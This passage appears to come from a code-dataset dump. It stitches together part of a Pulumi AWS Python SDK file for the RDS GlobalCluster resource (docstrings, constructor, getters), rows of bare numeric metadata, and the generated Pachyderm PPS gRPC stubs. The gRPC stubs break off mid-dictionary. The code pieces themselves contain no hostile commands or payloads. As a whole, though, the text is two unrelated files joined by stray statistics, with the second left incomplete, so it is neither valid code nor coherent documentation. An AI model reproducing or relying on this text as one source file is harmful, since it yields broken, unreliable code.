secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-secondary-cluster-instance",
cluster_identifier=secondary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"]))
```
### New Global Cluster From Existing DB Cluster
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
example_cluster = aws.rds.Cluster("exampleCluster")
example_global_cluster = aws.rds.GlobalCluster("exampleGlobalCluster",
force_destroy=True,
global_cluster_identifier="example",
source_db_cluster_identifier=example_cluster.arn)
```
## Import
`aws_rds_global_cluster` can be imported by using the RDS Global Cluster identifier, e.g.,
```sh
$ pulumi import aws:rds/globalCluster:GlobalCluster example example
```
Certain resource arguments, like `force_destroy`, only exist within this provider. If the argument is set in the the provider configuration on an imported resource, This provider will show a difference on the first plan after import to update the state value. This change is safe to apply immediately so the state matches the desired configuration. Certain resource arguments, like `source_db_cluster_identifier`, do not have an API method for reading the information after creation. If the argument is set in the provider configuration on an imported resource, the provider will always show a difference. To workaround this behavior, either omit the argument from the the provider configuration or use `ignore_changes` to hide the difference, e.g. terraform resource "aws_rds_global_cluster" "example" {
# ... other configuration ...
# There is no API for reading source_db_cluster_identifier
lifecycle {
ignore_changes = [source_db_cluster_identifier]
} }
:param str resource_name: The name of the resource.
:param GlobalClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database_name: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
global_cluster_identifier: Optional[pulumi.Input[str]] = None,
source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalClusterArgs.__new__(GlobalClusterArgs)
__props__.__dict__["database_name"] = database_name
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["engine"] = engine
__props__.__dict__["engine_version"] = engine_version
__props__.__dict__["force_destroy"] = force_destroy
if global_cluster_identifier is None and not opts.urn:
raise TypeError("Missing required property 'global_cluster_identifier'")
__props__.__dict__["global_cluster_identifier"] = global_cluster_identifier
__props__.__dict__["source_db_cluster_identifier"] = source_db_cluster_identifier
__props__.__dict__["storage_encrypted"] = storage_encrypted
__props__.__dict__["arn"] = None
__props__.__dict__["global_cluster_members"] = None
__props__.__dict__["global_cluster_resource_id"] = None
super(GlobalCluster, __self__).__init__(
'aws:rds/globalCluster:GlobalCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
global_cluster_identifier: Optional[pulumi.Input[str]] = None,
global_cluster_members: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalClusterGlobalClusterMemberArgs']]]]] = None,
global_cluster_resource_id: Optional[pulumi.Input[str]] = None,
source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None) -> 'GlobalCluster':
"""
Get an existing GlobalCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: RDS Global Cluster Amazon Resource Name (ARN)
:param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
:param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
:param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
:param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
:param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
:param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalClusterGlobalClusterMemberArgs']]]] global_cluster_members: Set of objects containing Global Cluster members.
:param pulumi.Input[str] global_cluster_resource_id: AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
:param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _GlobalClusterState.__new__(_GlobalClusterState)
__props__.__dict__["arn"] = arn
__props__.__dict__["database_name"] = database_name
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["engine"] = engine
__props__.__dict__["engine_version"] = engine_version
__props__.__dict__["force_destroy"] = force_destroy
__props__.__dict__["global_cluster_identifier"] = global_cluster_identifier
__props__.__dict__["global_cluster_members"] = global_cluster_members
__props__.__dict__["global_cluster_resource_id"] = global_cluster_resource_id
__props__.__dict__["source_db_cluster_identifier"] = source_db_cluster_identifier
__props__.__dict__["storage_encrypted"] = storage_encrypted
return GlobalCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
RDS Global Cluster Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[Optional[str]]:
"""
Name for an automatically created database on cluster creation.
"""
return pulumi.get(self, "database_name")
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> pulumi.Output[Optional[bool]]:
"""
If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
"""
return pulumi.get(self, "deletion_protection")
@property
@pulumi.getter
def engine(self) -> pulumi.Output[str]:
"""
Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "engine")
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> pulumi.Output[str]:
"""
Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
"""
return pulumi.get(self, "engine_version")
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> pulumi.Output[Optional[bool]]:
"""
Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "force_destroy")
@property
@pulumi.getter(name="globalClusterIdentifier")
def global_cluster_identifier(self) -> pulumi.Output[str]:
"""
The global cluster identifier.
"""
return pulumi.get(self, "global_cluster_identifier")
@property
@pulumi.getter(name="globalClusterMembers")
def global_cluster_members(self) -> pulumi.Output[Sequence['outputs.GlobalClusterGlobalClusterMember']]:
"""
Set of objects containing Global Cluster members.
"""
return pulumi.get(self, "global_cluster_members")
@property
@pulumi.getter(name="globalClusterResourceId")
def global_cluster_resource_id(self) -> pulumi.Output[str]:
"""
AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
"""
return pulumi.get(self, "global_cluster_resource_id")
@property
@pulumi.getter(name="sourceDbClusterIdentifier")
def source_db_cluster_identifier(self) -> pulumi.Output[str]:
"""
Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
"""
return pulumi.get(self, "source_db_cluster_identifier")
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> pulumi.Output[bool]:
"""
Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "storage_encrypted")
| 54.390681
| 813
| 0.689226
| 5,330
| 45,525
| 5.673921
| 0.058724
| 0.048013
| 0.050889
| 0.0496
| 0.935123
| 0.924773
| 0.915515
| 0.904669
| 0.898486
| 0.883077
| 0
| 0.002399
| 0.22179
| 45,525
| 836
| 814
| 54.455742
| 0.851219
| 0.532389
| 0
| 0.746356
| 1
| 0
| 0.133912
| 0.066022
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163265
| false
| 0.002915
| 0.020408
| 0
| 0.282799
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b9b33ca5d233a19fd52f8910238c8c269ad4cfdd
| 47,185
|
py
|
Python
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 57
|
2018-02-25T16:23:47.000Z
|
2022-02-08T08:48:12.000Z
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 209
|
2018-02-16T14:31:25.000Z
|
2022-03-15T15:24:19.000Z
|
src/python_pachyderm/proto/v2/pps/pps_pb2_grpc.py
|
pachyderm/python-pachyderm
|
9dbffba91ac753e7c63c58d71768f53f83789cb9
|
[
"Apache-2.0"
] | 23
|
2018-02-16T15:31:46.000Z
|
2022-03-09T20:41:31.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from python_pachyderm.proto.v2.pfs import pfs_pb2 as python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2
from python_pachyderm.proto.v2.pps import pps_pb2 as python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2
class APIStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.InspectJob = channel.unary_unary(
'/pps_v2.API/InspectJob',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
)
self.InspectJobSet = channel.unary_stream(
'/pps_v2.API/InspectJobSet',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobSetRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
)
self.ListJob = channel.unary_stream(
'/pps_v2.API/ListJob',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
)
self.ListJobSet = channel.unary_stream(
'/pps_v2.API/ListJobSet',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobSetRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobSetInfo.FromString,
)
self.SubscribeJob = channel.unary_stream(
'/pps_v2.API/SubscribeJob',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SubscribeJobRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.FromString,
)
self.DeleteJob = channel.unary_unary(
'/pps_v2.API/DeleteJob',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.StopJob = channel.unary_unary(
'/pps_v2.API/StopJob',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopJobRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.InspectDatum = channel.unary_unary(
'/pps_v2.API/InspectDatum',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectDatumRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
)
self.ListDatum = channel.unary_stream(
'/pps_v2.API/ListDatum',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListDatumRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.FromString,
)
self.RestartDatum = channel.unary_unary(
'/pps_v2.API/RestartDatum',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RestartDatumRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.CreatePipeline = channel.unary_unary(
'/pps_v2.API/CreatePipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreatePipelineRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.InspectPipeline = channel.unary_unary(
'/pps_v2.API/InspectPipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectPipelineRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
)
self.ListPipeline = channel.unary_stream(
'/pps_v2.API/ListPipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListPipelineRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.FromString,
)
self.DeletePipeline = channel.unary_unary(
'/pps_v2.API/DeletePipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeletePipelineRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.StartPipeline = channel.unary_unary(
'/pps_v2.API/StartPipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StartPipelineRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.StopPipeline = channel.unary_unary(
'/pps_v2.API/StopPipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopPipelineRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.RunPipeline = channel.unary_unary(
'/pps_v2.API/RunPipeline',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunPipelineRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.RunCron = channel.unary_unary(
'/pps_v2.API/RunCron',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunCronRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.CreateSecret = channel.unary_unary(
'/pps_v2.API/CreateSecret',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreateSecretRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.DeleteSecret = channel.unary_unary(
'/pps_v2.API/DeleteSecret',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteSecretRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListSecret = channel.unary_unary(
'/pps_v2.API/ListSecret',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfos.FromString,
)
self.InspectSecret = channel.unary_unary(
'/pps_v2.API/InspectSecret',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectSecretRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SecretInfo.FromString,
)
self.DeleteAll = channel.unary_unary(
'/pps_v2.API/DeleteAll',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GetLogs = channel.unary_stream(
'/pps_v2.API/GetLogs',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.GetLogsRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.LogMessage.FromString,
)
self.ActivateAuth = channel.unary_unary(
'/pps_v2.API/ActivateAuth',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthRequest.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ActivateAuthResponse.FromString,
)
self.UpdateJobState = channel.unary_unary(
'/pps_v2.API/UpdateJobState',
request_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.UpdateJobStateRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.RunLoadTestDefault = channel.unary_unary(
'/pps_v2.API/RunLoadTestDefault',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pfs_dot_pfs__pb2.RunLoadTestResponse.FromString,
)
class APIServicer(object):
"""Missing associated documentation comment in .proto file."""
def InspectJob(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InspectJobSet(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListJob(self, request, context):
"""ListJob returns information about current and past Pachyderm jobs.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListJobSet(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SubscribeJob(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteJob(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StopJob(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InspectDatum(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListDatum(self, request, context):
"""ListDatum returns information about each datum fed to a Pachyderm job
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RestartDatum(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreatePipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InspectPipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListPipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeletePipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StartPipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StopPipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RunPipeline(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RunCron(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateSecret(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteSecret(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListSecret(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InspectSecret(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteAll(self, request, context):
"""DeleteAll deletes everything
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLogs(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ActivateAuth(self, request, context):
"""An internal call that causes PPS to put itself into an auth-enabled state
(all pipeline have tokens, correct permissions, etcd)
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateJobState(self, request, context):
"""An internal call used to move a job from one state to another
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def RunLoadTestDefault(self, request, context):
"""RunLoadTest runs the default load test.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_APIServicer_to_server(servicer, server):
rpc_method_handlers = {
'InspectJob': grpc.unary_unary_rpc_method_handler(
servicer.InspectJob,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.SerializeToString,
),
'InspectJobSet': grpc.unary_stream_rpc_method_handler(
servicer.InspectJobSet,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectJobSetRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.SerializeToString,
),
'ListJob': grpc.unary_stream_rpc_method_handler(
servicer.ListJob,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.SerializeToString,
),
'ListJobSet': grpc.unary_stream_rpc_method_handler(
servicer.ListJobSet,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListJobSetRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobSetInfo.SerializeToString,
),
'SubscribeJob': grpc.unary_stream_rpc_method_handler(
servicer.SubscribeJob,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.SubscribeJobRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.JobInfo.SerializeToString,
),
'DeleteJob': grpc.unary_unary_rpc_method_handler(
servicer.DeleteJob,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeleteJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'StopJob': grpc.unary_unary_rpc_method_handler(
servicer.StopJob,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopJobRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'InspectDatum': grpc.unary_unary_rpc_method_handler(
servicer.InspectDatum,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectDatumRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.SerializeToString,
),
'ListDatum': grpc.unary_stream_rpc_method_handler(
servicer.ListDatum,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListDatumRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DatumInfo.SerializeToString,
),
'RestartDatum': grpc.unary_unary_rpc_method_handler(
servicer.RestartDatum,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RestartDatumRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'CreatePipeline': grpc.unary_unary_rpc_method_handler(
servicer.CreatePipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.CreatePipelineRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'InspectPipeline': grpc.unary_unary_rpc_method_handler(
servicer.InspectPipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.InspectPipelineRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.SerializeToString,
),
'ListPipeline': grpc.unary_stream_rpc_method_handler(
servicer.ListPipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.ListPipelineRequest.FromString,
response_serializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.PipelineInfo.SerializeToString,
),
'DeletePipeline': grpc.unary_unary_rpc_method_handler(
servicer.DeletePipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.DeletePipelineRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'StartPipeline': grpc.unary_unary_rpc_method_handler(
servicer.StartPipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StartPipelineRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'StopPipeline': grpc.unary_unary_rpc_method_handler(
servicer.StopPipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.StopPipelineRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'RunPipeline': grpc.unary_unary_rpc_method_handler(
servicer.RunPipeline,
request_deserializer=python__pachyderm_dot_proto_dot_v2_dot_pps_dot_pps__pb2.RunPipelineRequest.FromString,
